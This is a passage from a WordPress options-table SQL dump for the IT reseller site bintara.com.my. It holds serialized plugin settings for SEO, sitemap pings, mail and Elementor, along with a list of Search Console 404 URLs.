p=https%3A%2F%2Fbintara.com.my%2Fsitemap.xml\";s:4:\"name\";s:6:\"Google\";}s:4:\"bing\";a:5:{s:9:\"startTime\";d:1573020819.951613903045654296875;s:7:\"endTime\";d:1573020821.233747959136962890625;s:7:\"success\";b:1;s:3:\"url\";s:90:\"http://www.bing.com/webmaster/ping.aspx?siteMap=https%3A%2F%2Fbintara.com.my%2Fsitemap.xml\";s:4:\"name\";s:4:\"Bing\";}}s:38:\"\0GoogleSitemapGeneratorStatus\0autoSave\";b:1;}','no'),(48801,'sharing-options','a:1:{s:6:\"global\";a:5:{s:12:\"button_style\";s:9:\"icon-text\";s:13:\"sharing_label\";s:11:\"Share this:\";s:10:\"open_links\";s:4:\"same\";s:4:\"show\";a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}s:6:\"custom\";a:0:{}}}','yes'),(48802,'stats_options','a:7:{s:9:\"admin_bar\";b:1;s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:11:\"count_roles\";a:0:{}s:7:\"blog_id\";i:156078236;s:12:\"do_not_track\";b:1;s:10:\"hide_smile\";b:1;s:7:\"version\";s:1:\"9\";}','yes'),(59574,'_transient_onepress_categories','1','yes'),(61409,'_transient_wpseo_site_information','O:8:\"stdClass\":2:{s:3:\"url\";s:22:\"https://bintara.com.my\";s:13:\"subscriptions\";a:0:{}}','no'),(49423,'category_children','a:0:{}','yes'),(237,'nav_menu_options','a:1:{s:8:\"auto_add\";a:0:{}}','yes'),(208,'maxbuttons_version','7.13.1','yes'),(209,'MBFREE_CREATED','1544494017','yes'),(210,'MBFREE_HOMEURL','https://bintara.com.my','yes'),(211,'maxbuttons_user_level','manage_options','yes'),(212,'WPLANG','','yes'),(213,'new_admin_email','faiz@bintara.com.my','yes'),(230,'vfb_db_version','2.9','yes'),(231,'widget_vfb_widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(232,'vfb_dashboard_widget_options','a:1:{s:28:\"vfb_dashboard_recent_entries\";a:1:{s:5:\"items\";i:5;}}','yes'),(245,'wp_mail_smtp_initial_version','1.4.1','no'),(251,'wp_mail_smtp_debug','a:0:{}','no'),(246,'wp_mail_smtp_version','1.7.0','no'),(247,'wp_mail_smtp','a:2:{s:4:\"mail\";a:6:{s:10:\"from_email\";s:19:\"faiz@bintara.com.my\";s:9:\"from_name\";s:35:\"Bintara Solutions Sdn Bhd (BINTARA)\";s:6:\"mailer\";s:4:\"mail\";s:11:\"return_path\";b:0;s:16:\"from_email_force\";b:0;s:15:\"from_name_force\";b:0;}s:4:\"smtp\";a:1:{s:7:\"autotls\";b:1;}}','no'),(248,'_amn_smtp_last_checked','1570060800','yes'),(256,'_transient__demo_contents_file_onepress','a:2:{s:3:\"xml\";i:1274;s:4:\"json\";i:1275;}','yes'),(472,'_transient_timeout_wpseo_link_table_inaccessible','1576052153','no'),(473,'_transient_wpseo_link_table_inaccessible','0','no'),(474,'_transient_timeout_wpseo_meta_table_inaccessible','1576052153','no'),(475,'_transient_wpseo_meta_table_inaccessible','0','no'),(330,'akismet_spam_count','2','yes'),(392,'disable_comments_options','a:5:{s:19:\"disabled_post_types\";a:0:{}s:17:\"remove_everywhere\";b:0;s:9:\"permanent\";b:0;s:16:\"extra_post_types\";b:0;s:10:\"db_version\";i:6;}','yes'),(469,'wpseo','a:20:{s:15:\"ms_defaults_set\";b:1;s:7:\"version\";s:4:\"12.3\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1544516152;s:13:\"myyoast-oauth\";b:0;}','yes'),(470,'wpseo_titles','a:81:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:23:\"is-media-purge-relevant\";b:0;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:11:\"person_logo\";s:0:\"\";s:14:\"person_logo_id\";i:0;s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:15:\"company_logo_id\";i:0;s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:7:\"company\";s:25:\"company_or_person_user_id\";b:0;s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:15:\"title-portfolio\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:18:\"metadesc-portfolio\";s:0:\"\";s:17:\"noindex-portfolio\";b:0;s:18:\"showdate-portfolio\";b:0;s:28:\"display-metabox-pt-portfolio\";b:1;s:28:\"post_types-portfolio-maintax\";i:0;s:23:\"title-tax-portfolio_cat\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:26:\"metadesc-tax-portfolio_cat\";s:0:\"\";s:25:\"noindex-tax-portfolio_cat\";b:0;s:31:\"taxonomy-portfolio_cat-ptparent\";i:0;}','yes'),(471,'wpseo_social','a:20:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(56244,'elementor_controls_usage','a:2:{s:7:\"wp-post\";a:10:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:557;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:557;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:8:{s:5:\"align\";i:147;s:10:\"text_color\";i:12;s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:1;s:22:\"typography_line_height\";i:3;s:25:\"typography_letter_spacing\";i:3;s:12:\"text_columns\";i:3;s:10:\"column_gap\";i:2;}}s:8:\"advanced\";a:3:{s:19:\"_section_background\";a:1:{s:22:\"_background_background\";i:1;}s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:44;s:8:\"_padding\";i:5;}s:15:\"_section_border\";a:1:{s:13:\"_border_color\";i:6;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:714;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:4:{s:12:\"_inline_size\";i:546;s:21:\"space_between_widgets\";i:39;s:16:\"content_position\";i:31;s:5:\"align\";i:13;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:29;s:7:\"padding\";i:10;}}s:5:\"style\";a:2:{s:13:\"section_style\";a:1:{s:16:\"background_color\";i:2;}s:14:\"section_border\";a:4:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:13:\"border_radius\";i:2;s:12:\"border_color\";i:26;}}}}s:5:\"video\";a:2:{s:5:\"count\";i:21;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:8:{s:10:\"video_type\";i:1;s:11:\"youtube_url\";i:21;s:10:\"insert_url\";i:1;s:12:\"external_url\";i:1;s:8:\"autoplay\";i:1;s:4:\"loop\";i:1;s:8:\"controls\";i:1;s:3:\"rel\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:385;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:217;}s:14:\"section_layout\";a:3:{s:13:\"content_width\";i:7;s:16:\"content_position\";i:3;s:8:\"overflow\";i:6;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:7:{s:21:\"background_background\";i:28;s:16:\"background_color\";i:25;s:27:\"background_hover_background\";i:1;s:16:\"background_image\";i:1;s:19:\"background_position\";i:1;s:21:\"background_attachment\";i:1;s:15:\"background_size\";i:1;}s:14:\"section_border\";a:4:{s:13:\"border_border\";i:12;s:12:\"border_width\";i:4;s:12:\"border_color\";i:15;s:13:\"border_radius\";i:19;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:7:\"padding\";i:2;s:6:\"margin\";i:10;}}}}s:6:\"spacer\";a:2:{s:5:\"count\";i:41;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:26;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:136;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:5:\"image\";i:136;s:10:\"image_size\";i:23;s:22:\"image_custom_dimension\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:106;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:106;s:11:\"header_size\";i:78;s:5:\"align\";i:55;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:106;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:8:\"_padding\";i:3;s:7:\"_margin\";i:10;}}}}s:7:\"divider\";a:2:{s:5:\"count\";i:12;s:8:\"controls\";a:0:{}}s:13:\"image-gallery\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:15:\"section_gallery\";a:4:{s:10:\"wp_gallery\";i:3;s:14:\"thumbnail_size\";i:3;s:15:\"gallery_columns\";i:3;s:13:\"open_lightbox\";i:1;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:27;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:4:{s:4:\"text\";i:27;s:4:\"link\";i:27;s:5:\"align\";i:27;s:4:\"size\";i:27;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:16:\"background_color\";i:27;}}}}}s:7:\"wp-page\";a:6:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:-138;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:-138;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:-139;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:-140;s:16:\"content_position\";i:15;s:5:\"align\";i:8;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:-43;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:3:{s:13:\"content_width\";i:1;s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:-44;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:-16;s:16:\"background_color\";i:3;}}}}s:6:\"spacer\";a:2:{s:5:\"count\";i:-4;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:-4;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:-4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:-4;s:5:\"align\";i:-4;s:11:\"header_size\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:-4;}}}}s:5:\"video\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:2:{s:11:\"youtube_url\";i:1;s:8:\"autoplay\";i:1;}}}}}}','no'),(1206,'widget_black-studio-tinymce','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3792,'ai1wm_updater','a:0:{}','yes'),(7043,'wpseo-gsc-issues-smartphone_only-not_found','a:101:{i:0;a:6:{s:3:\"url\";s:27:\"/logitech/logitech-group-2/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544497009\";s:12:\"last_crawled\";s:17:\"December 11, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544497009\";s:13:\"response_code\";i:404;}i:1;a:6:{s:3:\"url\";s:25:\"/portfolio/hp/hp-logo-v2/\";s:14:\"first_detected\";s:17:\"December 13, 2018\";s:18:\"first_detected_raw\";s:10:\"1544722107\";s:12:\"last_crawled\";s:17:\"December 13, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544722107\";s:13:\"response_code\";i:404;}i:2;a:6:{s:3:\"url\";s:33:\"/docusign/smb-keybenefits-2-2_07/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211422\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211422\";s:13:\"response_code\";i:404;}i:3;a:6:{s:3:\"url\";s:40:\"/portfolio/bitdefender/bitdefender-logo/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544539935\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546104541\";s:13:\"response_code\";i:404;}i:4;a:6:{s:3:\"url\";s:37:\"/our-vision/www-hdfinewallpapers-com/\";s:14:\"first_detected\";s:17:\"December 13, 2018\";s:18:\"first_detected_raw\";s:10:\"1544732950\";s:12:\"last_crawled\";s:17:\"December 18, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545138551\";s:13:\"response_code\";i:404;}i:5;a:6:{s:3:\"url\";s:16:\"/toughpad-fz-x1/\";s:14:\"first_detected\";s:17:\"December 14, 2018\";s:18:\"first_detected_raw\";s:10:\"1544798464\";s:12:\"last_crawled\";s:17:\"December 28, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546018829\";s:13:\"response_code\";i:404;}i:6;a:6:{s:3:\"url\";s:23:\"/send-quote-teamviewer/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546218622\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546218622\";s:13:\"response_code\";i:404;}i:7;a:6:{s:3:\"url\";s:20:\"/skype-for-business/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544505321\";s:12:\"last_crawled\";s:17:\"December 28, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546030448\";s:13:\"response_code\";i:404;}i:8;a:6:{s:3:\"url\";s:97:\"/hp-designjet-t2530-multifunction-printer-series/hp-designjet-t2530-multifunction-printer-series/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546214033\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546214033\";s:13:\"response_code\";i:404;}i:9;a:6:{s:3:\"url\";s:9:\"/ptz-pro/\";s:14:\"first_detected\";s:17:\"December 15, 2018\";s:18:\"first_detected_raw\";s:10:\"1544878087\";s:12:\"last_crawled\";s:17:\"December 15, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544878087\";s:13:\"response_code\";i:404;}i:10;a:6:{s:3:\"url\";s:12:\"/tag/markup/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546208970\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546208970\";s:13:\"response_code\";i:404;}i:11;a:6:{s:3:\"url\";s:31:\"/toughbook-t1/fz-t1_image3-2_1/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211659\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211659\";s:13:\"response_code\";i:404;}i:12;a:6:{s:3:\"url\";s:30:\"/portfolio/netapp/netapp-logo/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211106\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211106\";s:13:\"response_code\";i:404;}i:13;a:6:{s:3:\"url\";s:20:\"/our-history/about2/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211580\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211580\";s:13:\"response_code\";i:404;}i:14;a:6:{s:3:\"url\";s:14:\"/docusign/smb/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546216644\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546216644\";s:13:\"response_code\";i:404;}i:15;a:6:{s:3:\"url\";s:41:\"/toughbook-54/236375_tb54-head-on-win-10/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211976\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211976\";s:13:\"response_code\";i:404;}i:16;a:6:{s:3:\"url\";s:14:\"/toughbook-54/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544509211\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546042811\";s:13:\"response_code\";i:404;}i:17;a:6:{s:3:\"url\";s:21:\"/category/responsive/\";s:14:\"first_detected\";s:17:\"December 13, 2018\";s:18:\"first_detected_raw\";s:10:\"1544673058\";s:12:\"last_crawled\";s:17:\"December 13, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544673058\";s:13:\"response_code\";i:404;}i:18;a:6:{s:3:\"url\";s:30:\"/portfolio/veeam/logo-veeam-2/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546212055\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546212055\";s:13:\"response_code\";i:404;}i:19;a:6:{s:3:\"url\";s:25:\"/shop/?orderby=popularity\";s:14:\"first_detected\";s:17:\"December 21, 2018\";s:18:\"first_detected_raw\";s:10:\"1545399752\";s:12:\"last_crawled\";s:17:\"December 21, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545399752\";s:13:\"response_code\";i:404;}i:20;a:6:{s:3:\"url\";s:33:\"/product/teamviewer-12-corporate/\";s:14:\"first_detected\";s:17:\"December 19, 2018\";s:18:\"first_detected_raw\";s:10:\"1545179943\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546266809\";s:13:\"response_code\";i:404;}i:21;a:6:{s:3:\"url\";s:20:\"/?attachment_id=1351\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546208891\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546208891\";s:13:\"response_code\";i:404;}i:22;a:6:{s:3:\"url\";s:9:\"/2016/02/\";s:14:\"first_detected\";s:17:\"December 25, 2018\";s:18:\"first_detected_raw\";s:10:\"1545718677\";s:12:\"last_crawled\";s:17:\"December 25, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545718677\";s:13:\"response_code\";i:404;}i:23;a:6:{s:3:\"url\";s:15:\"/category/apps/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546208812\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546208812\";s:13:\"response_code\";i:404;}i:24;a:6:{s:3:\"url\";s:38:\"/consultation-implementation-services/\";s:14:\"first_detected\";s:17:\"December 22, 2018\";s:18:\"first_detected_raw\";s:10:\"1545474326\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546202324\";s:13:\"response_code\";i:404;}i:25;a:6:{s:3:\"url\";s:29:\"/markup-text-alignment/blog2/\";s:14:\"first_detected\";s:17:\"December 16, 2018\";s:18:\"first_detected_raw\";s:10:\"1544960088\";s:12:\"last_crawled\";s:17:\"December 27, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545893723\";s:13:\"response_code\";i:404;}i:26;a:6:{s:3:\"url\";s:17:\"/?attachment_id=8\";s:14:\"first_detected\";s:17:\"December 19, 2018\";s:18:\"first_detected_raw\";s:10:\"1545182199\";s:12:\"last_crawled\";s:17:\"December 19, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545182199\";s:13:\"response_code\";i:404;}i:27;a:6:{s:3:\"url\";s:34:\"/portfolio/autodesk/logo-autodesk/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546210868\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546210868\";s:13:\"response_code\";i:404;}i:28;a:6:{s:3:\"url\";s:30:\"/portfolio/vmware/vmware-logo/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546214271\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546214271\";s:13:\"response_code\";i:404;}i:29;a:6:{s:3:\"url\";s:25:\"/toughbook-20/tpq2-specs/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546210789\";s:12:\"last_crawled\";s:15:\"January 1, 2019\";s:16:\"last_crawled_raw\";s:10:\"1546349070\";s:13:\"response_code\";i:404;}i:30;a:6:{s:3:\"url\";s:95:\"/hp-designjet-t830-multifunction-printer-series/hp-designjet-t830-multifunction-printer-series/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546253752\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546253752\";s:13:\"response_code\";i:404;}i:31;a:6:{s:3:\"url\";s:26:\"/my-account/lost-password/\";s:14:\"first_detected\";s:17:\"December 26, 2018\";s:18:\"first_detected_raw\";s:10:\"1545814441\";s:12:\"last_crawled\";s:17:\"December 26, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545814441\";s:13:\"response_code\";i:404;}i:32;a:6:{s:3:\"url\";s:15:\"/tag/alignment/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546218227\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546218227\";s:13:\"response_code\";i:404;}i:33;a:6:{s:3:\"url\";s:42:\"/tc51-tc56-touch-computer-series/tc-51-56/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546218385\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546218385\";s:13:\"response_code\";i:404;}i:34;a:6:{s:3:\"url\";s:17:\"/service-title-6/\";s:14:\"first_detected\";s:17:\"December 28, 2018\";s:18:\"first_detected_raw\";s:10:\"1545984437\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546071266\";s:13:\"response_code\";i:404;}i:35;a:6:{s:3:\"url\";s:44:\"/toughpad-fz-x1/235054_specs-prod-fzx1-hero/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546212139\";s:12:\"last_crawled\";s:15:\"January 1, 2019\";s:16:\"last_crawled_raw\";s:10:\"1546364827\";s:13:\"response_code\";i:404;}i:36;a:6:{s:3:\"url\";s:20:\"/share-point-online/\";s:14:\"first_detected\";s:17:\"December 29, 2018\";s:18:\"first_detected_raw\";s:10:\"1546119884\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546119884\";s:13:\"response_code\";i:404;}i:37;a:6:{s:3:\"url\";s:12:\"/our-vision/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546267759\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546267759\";s:13:\"response_code\";i:404;}i:38;a:6:{s:3:\"url\";s:20:\"/system-integration/\";s:14:\"first_detected\";s:17:\"December 24, 2018\";s:18:\"first_detected_raw\";s:10:\"1545687543\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546191303\";s:13:\"response_code\";i:404;}i:39;a:6:{s:3:\"url\";s:14:\"/author/admin/\";s:14:\"first_detected\";s:17:\"December 12, 2018\";s:18:\"first_detected_raw\";s:10:\"1544615640\";s:12:\"last_crawled\";s:17:\"December 12, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544615640\";s:13:\"response_code\";i:404;}i:40;a:6:{s:3:\"url\";s:18:\"/rugged-solutions/\";s:14:\"first_detected\";s:17:\"December 18, 2018\";s:18:\"first_detected_raw\";s:10:\"1545174567\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546097390\";s:13:\"response_code\";i:404;}i:41;a:6:{s:3:\"url\";s:17:\"/service-title-2/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544505455\";s:12:\"last_crawled\";s:17:\"December 28, 